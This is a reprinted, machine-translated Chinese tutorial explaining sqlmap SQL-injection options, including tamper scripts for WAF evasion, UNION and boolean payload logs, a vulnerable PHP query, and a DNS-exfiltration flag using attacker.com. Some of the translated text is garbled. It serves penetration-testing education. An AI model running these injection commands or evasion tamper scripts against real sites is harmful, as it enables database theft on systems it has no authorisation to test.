Safety Test ===sqlmap (one) reprint

Source: Internet
Author: User
Tags logical operators microsoft sql server mysql version postgresql readable sql injection uppercase letter

Vi.. Optimization

These parameters can optimize the performance of the Sqlmap.

1. One-click Optimization

Parameter:-O

Adding this parameter is equivalent to adding the following three optimization parameters at the same time:

    • --keep-alive
    • --null-connection
    • --threads=3 (If a better value is not set)

The specific meanings of these parameters are shown later in this article.

2.HTTP Long Connection

Parameter:--keep-alive

This parameter allows Sqlmap to use an HTTP long connection. This argument contradicts the "--proxy".

3.HTTP NULL Connection

Parameter:--null-connection

There is a special type of HTTP request that can directly get the size of the HTTP response without getting the HTTP response body. Obviously, this can save a lot of bandwidth in a Boolean blind. Of course, this technique requires server-side support. This argument contradicts the "--text-only".

4.HTTP concurrency

Parameter:--threads

Use this parameter to specify the maximum number of concurrent sqlmap that can be reached. No more than 10 of the maximum concurrency is considered in terms of performance and site affordability.

Seven, inject

These parameters are used to specify the parameters to test, custom attack loads, and select tamper scripts.

1. The injection point to test

Parameters:-P and--skip

By default, sqlmap tests all get parameters and post parameters, and when level is greater than or equal to 2, the cookie parameter is tested and User-agent and referer are tested when level is greater than or equal to 3. You can actually manually specify a comma-delimited list of parameters to test, and the parameters in the list are not subject to level restrictions. This is the role of "-P".

For example, if you want to test only the Get parameter "id" and user-agent, you can write this:

  -p "id,user-agent"

You can use "--skip" if you do not want to test a parameter. If you set the level to 5 but do not want to test user-agent and Referer, you can write this:

  --level=5 --skip="user-agent,referer"

Sometimes you encounter pseudo-static web pages. Dynamic Web pages will blatantly list parameters such as:

  /user.php?id=1

The parameter is obviously an ID with a value of 1. But if the pseudo-static web page may be written like this:

  /user/1/

Hides the parameter in the URL. Typically, Sqlmap does not test the parameters of such pseudo-static web pages, because Sqlmap cannot tell which is the parameter. If you want to test this pseudo-static, just add "*", tell Sqlmap which is a pseudo-static parameter on the line, the left and get parameters are no different. Such as:

  python sqlmap.py -u "http(s)://target.cc/user/1*/"
2. Specifying a database management system

Parameter:--dbms

The DBMS is the abbreviation for "Database Management System". By default, Sqlmap automatically detects the database management system used by the Web site, and Sqlmap supports these database management systems:

    • Mysql
    • Oracle
    • PostgreSQL
    • Microsoft SQL Server
    • Microsoft Access
    • Firebird
    • Sqlite
    • Sybase
    • SAP MaxDB
    • DB2

If Sqlmap automatically detects failures or does not want Sqlmap to perform database fingerprint detection, you can manually specify the database management system using the parameter "--dbms", such as "--dbms PostgreSQL".

For MySQL and Microsoft SQL Server, and to specify this:

  --dbms MySQL <version>  --dbms Microsoft SQL Server <version>

For MySQL, it's like this: 5.0. For Microsoft SQL Server, it is similar to this: 2005.

If you add "--fingerprint" while adding the "--dbms" parameter, Sqlmap will only identify the fingerprint within the specified database management system.

Use "--dbms" only when you are sure, or let sqlmap automatically detect better.

3. Specify the operating system running the database management system

Parameter:--os

By default, Sqlmap automatically detects the operating system running the database management system, and the currently fully supported operating systems are:

    • Linux
    • Windows

If you are sure you can use the parameter "--os" to specify the operating system running the database management system. Of course, you should use this parameter only when you are sure of it, or let Sqlmap automatically detect it better.

4. Forced use of large numbers when generating invalid parameter values

Parameter:--invalid-bignum

Sometimes it is necessary to generate an invalid parameter when injecting the test, in general Sqlmap takes an inverse number (such as: ID=-13) of an existing parameter (such as: id=13) as an invalid parameter. However, if you add "--invalid-bignum", Sqlmap will take a large number (for example: id=99999999) as an invalid parameter.

5. Forcing the use of logical operators when generating invalid parameter values

Parameter:--invalid-logical

Sometimes it is necessary to generate an invalid parameter when injecting the test, in general Sqlmap takes an inverse number (such as: ID=-13) of an existing parameter (such as: id=13) as an invalid parameter. However, if you add "--invalid-logical", Sqlmap will use logical operators (such as: Id=13 and 18=19) as invalid parameters.

6. Forcing the use of strings when generating invalid parameter values

Parameter:--invalid-string

Sometimes it is necessary to generate an invalid parameter when injecting the test, in general Sqlmap takes an inverse number (such as: ID=-13) of an existing parameter (such as: id=13) as an invalid parameter. However, if you add "--invalid-logical", Sqlmap will use a string (for example: ID=AKEWMC) as an invalid parameter.

7. Turn off payload conversion

Parameter:--no-cast

When the result is retrieved, Sqlmap converts all input to a string type and replaces it with a white-space character if it encounters a null value (NULL). This is done to prevent any errors such as connecting null values and strings from occurring and to simplify the data retrieval process. However, there are reports that this will cause problems with data retrieval in older versions of MySQL, so add "--no-cast" to tell Sqlmap not to do so.

8. Turn off string encoding

Parameter:--no-escape

Sometimes sqlmap uses string values enclosed in single quotes as payload, such as "Select ' Foobar '", which are encoded by default, as the previous example would be encoded as: "Select CHAR (102) +char (111) +char (111) + CHAR (98) +char (+char (114)) ". This can be confusing to make it difficult to gain insight into the content of payload and can be used in the background server like Magic_quote or mysql_real_escape_string such as an escape function, the string is not affected. Of course, in some cases it is necessary to turn off the string encoding, as in order to reduce the payload length, the user can use "--no-escape" to turn off string encoding.

9. Custom payload

Parameters:--prefix and--suffix

Sometimes only a user-specified suffix is added after payload to inject success. Another scenario is that the user already knows how the query statement is written, and the prefix and suffix of the payload can be specified directly to complete detection and injection.

An example of a vulnerable source code is as follows:

  query = "SELECT * FROM users WHERE id=(‘" . $\_GET[‘id‘] . "‘) LIMIT 0, 1";

For example, this allows Sqlmap to automatically detect the boundary range or manually indicate the boundary range:

  python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "‘)" --suffix "AND (‘abc‘=‘abc"

The final SQL statement will become:

  SELECT * FROM users WHERE id=(‘1‘) <PAYLOAD> AND (‘abc‘=‘abc‘) LIMIT 0, 1

The syntax of this sentence is correct, Payloa can also be executed.

In a simple test environment, SQLMAP does not need to be provided with a custom boundary range to automatically detect and complete the injection, but in the real world some applications can be complex, such as nested join queries, where a boundary range needs to be specified for Sqlmap.

10. Modify the injected data

Parameter:--tamper

In addition to encoding strings with char (), Sqlmap does not confuse payload. This parameter is used to confuse payload to bypass IPs or WAF. The parameter is followed by the name of a tamper script. If the tamper script is located in the tamper/directory of the Sqlmap installation directory, you can omit the path and suffix name and write the file name only. Multiple tamper scripts are separated by a space.

There are many tamper scripts available in the tamper/directory. The role of the tamper script is to confuse payload. We can also write our own tamper script, which belongs to the advanced usage of SQLMAP, a valid tamper script is as follows:

  # 必须要导入的库  from lib.core.enums import PRIORITY  # 定义该tamper脚本的优先级  __priority__ = PRIORITY.NORMAL  def tamper(payload):    ‘‘‘此处是tamper的说明‘‘‘    retVal = payload    # 此处是用于修改payload的代码    # 返回修改后的payload    return retVal

The following is an example whose goal is MySQL, assuming that the greater than sign, the space, and the start of the Select are forbidden:

  python sqlmap.py -u "http://192.168.56.101:8080/ScorePrj/?id=1"   --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

The Example section outputs the following:

  [12:55:52] [DEBUG] Cleaning up configuration parameters [12:55:52] [INFO] loading tamper script ' between ' [12:55:52] [  Info] Loading tamper script ' randomcase ' [12:55:52] [INFO] loading tamper script ' space2comment ' [...] [12:55:53] [info] testing for SQL injection on GET parameter ' id ' [12:55:53] [info] testing ' and boolean-based BLIND-WH ERE or HAVING clause ' [12:55:53] [PAYLOAD] 1 [12:55:53] [PAYLOAD] 1)/**/and/**/8083=4737/**/and/**/(4754/**/between/**/  4754/**/and/**/4754 [12:55:53] [PAYLOAD] 1)/**/and/**/4962=4962/**/and/**/(2361/**/between/**/2361/**/and/**/2361 [12:55:53] [PAYLOAD] 1/**/and/**/9754/**/between/**/1206/**/and/**/1206 [12:55:53] [PAYLOAD] 1/**/and/**/4962/**/ between/**/4962/**/and/**/4962 [12:55:53] [PAYLOAD] 1/**/AND/**/2741/**/BETWEEN/**/9323/**/AND/**/9323--/**/IHSA [ 12:55:53] [PAYLOAD] 1/**/and/**/4962/**/between/**/4962/**/and/**/4962--/**/wvui [12:55:53] [PAYLOAD] 1 ')/**/anD/** /1694=6061/**/and/**/(' zlwu ' = ' ZLWU [12:55:53] [PAYLOAD] 1 ')/**/and/**/4962=4962/**/and/**/(' dsfw ' = ' DSFW [12:55:53] [PAYLOAD] 1 '/**/and/**/6307=8901/**/and/**/' fkln ' = ' fKLn [12:55:53 ] [PAYLOAD] 1 '/**/and/**/4962=4962/**/and/**/' yfsp ' = ' YFSP [12:55:53] [PAYLOAD] 1% '/**/and/**/3549=6854/**/and/**/'%  ' = ' [12:55:53] [PAYLOAD] 1% '/**/and/**/4962=4962/**/and/**/'% ' = ' [...] [12:55:54] [PAYLOAD] 1)/**/UNION/**/ALL/**/SELECT/**/NULL--/**/NRTQ [12:55:54] [PAYLOAD] 1)/**/union/**/all/**/ Select/**/null,null--/**/jalk [12:55:54] [PAYLOAD] 1)/**/union/**/all/**/select/**/null,null,null--/**/ylpg [...]

Without tamper script, the partial output of the example above is:

  [...] [13:00:12] [info] testing for SQL injection on GET parameter ' id ' [13:00:12] [info] testing ' and boolean-based BLIND-WH ERE or HAVING clause ' [13:00:12] [PAYLOAD] 1) and 9902=5632 and (5820=5820 [13:00:12] [PAYLOAD] 1) and 6711=6711 and (71 74=7174 [13:00:12] [PAYLOAD] 1 and 7140=6136 [13:00:12] [PAYLOAD] 1 and 6711=6711 [13:00:12] [PAYLOAD] 1 and 1693=7532- -OQCR [13:00:12] [PAYLOAD] 1 and 6711=6711--QAPJ [13:00:12] [PAYLOAD] 1 ') and 6904=7395 and (' xblu ' = ' Xblu [13:00:12] [PAYLOAD] 1 ') and 6711=6711 and (' Rgox ' = ' Rgox [13:00:12] [PAYLOAD] 1 ' and 6469=7302 and ' macj ' = ' MACJ [13:00:12] [PAYLOAD ] 1 ' and 6711=6711 and ' psyg ' = ' psyg [13:00:12] [PAYLOAD] 1% ' and 7516=3605 and '% ' = ' [13:00:12] [PAYLOAD] 1% ' and 6711=6  711 and '% ' = ' [...] [13:00:12] [PAYLOAD] 1) UNION ALL select null--Mudh [13:00:12] [PAYLOAD] 1) UNION ALL select null,null--Qkid [13:00:12 ] [PAYLOAD] 1) UNION all SELECT null,null,null--iwvt [...]  
Viii. detection 1. Level of Detection

Parameter:--level

This parameter is used to specify the detection level, with a total of 5 levels. The default is 1, which means to do the least detection, corresponding, Level 5 indicates the most detection. The payload used by Sqlmap is stored in the directory xml/payloads/, which is in XML format and can be customized by itself. An excerpt of a payload is shown below:

  <test>      <title>AND boolean-based blind - WHERE or HAVING clause (Generic comment)</title>      <stype>1</stype>      <level>2</level>      <risk>1</risk>      <clause>1</clause>      <where>1</where>      <vector>AND [INFERENCE]</vector>      <request>          <payload>AND [RANDNUM]=[RANDNUM]</payload>          <comment>[GENERIC_SQL_COMMENT]</comment>      </request>      <response>          <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>      </response>  </test>

In the example above you can see a level tag with a value of 2, which is used when the payload is greater than or equal to 2 o'clock. The meaning of the risk tag is shown in the following article.

Detection levels not only affect the use of payload, but also affect the detection of injection points, get and post parameters are always detected, detection level greater than or equal to 2 will detect whether the cookie is injected, Detection levels greater than or equal to 3 will detect if User-agent and referer are injected.

If it wasn't clear where the injection point is, you can set a higher detection level.

It is strongly recommended that the detection level be increased before the official report to Sqlmap that a definitive injection vulnerability is detected.

2. Risk Level

Parameter:--risk

This parameter is used to specify the risk level, with a total of 4 levels of 1~4. The default risk level is 1, which in most cases is harmless to the test target. Risk Level 2 Adds a time-based injection test, Level 3 adds an or test.

If the injection point is in the UPDATE statement, using an OR test may modify the data for the entire table, which is clearly not what the attacker wants to see. So users need to be able to control risk levels to avoid potentially risky payload.

3. Page comparison

Parameters:--string 、--not-string 、--regexp

By default in Boolean injection, Sqlmap evaluates to TRUE or false by comparing the return page content. Sometimes, however, each page refreshes differently, such as dynamic ads on the page. Sqlmap will try to determine the dynamic parts of the page, but not always succeed. The user can use the parameter "--string" to indicate that a page that represents true will contain a string that is not included by the page that represents false, and that the string is not contained by Sqlmap to determine true or false, and the argument "--regexp" can be used if such strings are variable Specifies a regular expression to match such a string. Or use the parameter "--not-string" to indicate that a page that represents false contains a string that does not contain a page that represents true.

Parameter:--code

Or more simply, if the user knows that the page HTTP status code representing TRUE is 200 and the page HTTP status code that represents false is not 200, for example 401, you can tell sqlmap this message with the "--code" parameter, such as "--code=200".

Parameter:--titles

If the user knows the page that represents true title and the page title that represents false, the title of the page that represents true is "Welcome", the page that represents false is title "Forbidden", you can use the parameter "--titles" Let Sqlmap determine true or false based on title.

Parameter:--text-only

If there are many active content such as JavaScript in the HTTP response body, you can use the parameter "--text-only" to let Sqlmap focus only on plain text content.

Nine, injection technology

These parameters are used to make adjustments to specific SQL injection techniques.

1. Technology used in the inspection

Parameter:--technique

This parameter is used to specify the technique used to detect injection. By default, Sqlmap uses all of the technologies it supports to detect. This parameter is followed by an uppercase letter representing the detection technique with a value of B, E, U, S, T, or Q, meaning the following:

    • B:boolean-based Blind (Boolean injection)
    • e:error-based (Error type injection)
    • U:union query-based (can be combined with query injection)
    • s:stacked queries (can be multiple-statement query injection)
    • T:time-based Blind (based on time delay injection)
    • Q:inline queries (nested query injection)

You can use "--technique ES" to specify two detection techniques. "--technique BEUSTQ" is equivalent to the default.

To access the file system or Windows registry, be sure to add "S" for multi-statement query injection testing.

2. Delay setting based on time delay injection

Parameter:--time-sec

Use this parameter to set the delay time based on time delay injection, which defaults to 5 seconds.

3. Number of columns in federated query injection settings

Parameter:--union-cols

Sqlmap automatically detects the number of columns, ranging from 1 to 10, when a federated query is injected. When the level value is high, the upper limit of the number of column detection range is increased to 50.

You can use this parameter to specify the number of column detection ranges, such as "--union-cols 12-16", which makes the Sqlmap column detection range 12 to 16.

4. Character setting in federated query injection

Parameter:--union-char

By default, Sqlmap uses a null character (NULL) for union query injection. However, when the level value is high, Sqlmap generates a random number for union query injection. Because sometimes using null character injection will fail and the use of random numbers will succeed.

Use this parameter to specify the characters used in the union query injection, such as: "--union-char 123".

What does "character used in federated query injection" mean? Take a look at the following two examples:

The first example, do not use "--union-char", by default the characters used in union query injection are NULL characters (NULL):

  python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3

The partial output is:

  [10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,CONCAT(0x71707a6271,0x66546c7770497458576f6455476761654654745744684c5062585971794c556d55454a6c49525675,0x7162767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FAcV  [10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a6271,0x6b43674e76687959526b6452627255787373675a6f5a436f7266756d49424547496d506779456170,0x7162767671),NULL,NULL,NULL,NULL,NULL-- caXD

The first example, using "--union-char 123", specifies that the character used in the union query injection is "123":

  python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3 --union-char 123

The partial output is:

  [10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x776c71686e54726659424b49616d68756e64734d45774c4c7163494345794255784557597a484244,0x7178627071)-- aUXO  [10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x6f5278444767675156496c724563714e6568634c6b5950646a6f4e53516b776d77474e7141425273,0x7178627071),123-- lPHb

A closer look at the output of the two examples shows that "the character used in union query injection" is "XXX" in "union all SELECT xxx, xxx".

5. Table name settings in federated query injection

Parameter:--union-from

In some cases, a valid and accessible table name must be specified in a federated query, or the federated query will fail, as in Microsoft Access. (that is, some DBMS does not support "Select 1, 2;" For such a statement, select must have a from. Use this parameter to specify the table name, such as: "--union-from=users".

6.DNS Leak attack

Parameter:--dns-domain

Details of DNS breach attacks in SQL injection are in the paper "Data retrieval over DNS in SQL injection Attacks".

Suppose an attacker controls the domain name resolution server for a domain name (for example: attacker.com), that is, the IP address of the subdomain that queries the domain name will be queried by this domain name resolution server. The attacker could then use "--dns-domain attacker.com" for a DNS leak attack.

In fact, if the attacker does not control any domain name resolution server, then she can register a new domain name, and then set up a domain name resolution server to accept data.

7. Second-order injection attacks

Parameter:--second-order

Sometimes the injection results are displayed on a different page, and this parameter is used to indicate the page where the injection results are displayed, followed by a URL.

Ten, fingerprints

By default, the Sqlmap automatically identifies the injected target with the database management system fingerprint.

Parameters:-F or--fingerprint

You can add this parameter if you want to perform a more extensive database management system fingerprint identification.

Parameters:-B or--banner

You can add this parameter if you want more accurate fingerprint recognition results, as described in the following article.

Xi. violent cracking 1. Name of the violent crack table

Parameter:--common-tables

In some cases, "--tables" cannot be used to list table names in the database, such as:

    • MySQL version less than 5.0 does not have a information_schema table
    • Msysobjects table for Microsoft Access is not readable by default
    • Database user permissions are too low to read table names

When a table name cannot be read, you can use the parameter "--common-tables" brute-force table name, which uses a dictionary of Txt/common-tables.txt, which stores the common table name and can be edited manually.

2. Brute Force list name

Parameter:--common-columns

In some cases, "--columns" cannot be used to list column names in a data table, such as:

    • MySQL version less than 5.0 does not have a information_schema table
    • Msysobjects table for Microsoft Access is not readable by default
    • Database user permissions are too low to read column names

When a column name cannot be read, the parameter "--common-columns" can be used to brute-force list name, the dictionary used is txt/common-columns.txt, which stores a common column name, you can edit the file manually

Safety Test ===sqlmap (one) reprint

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.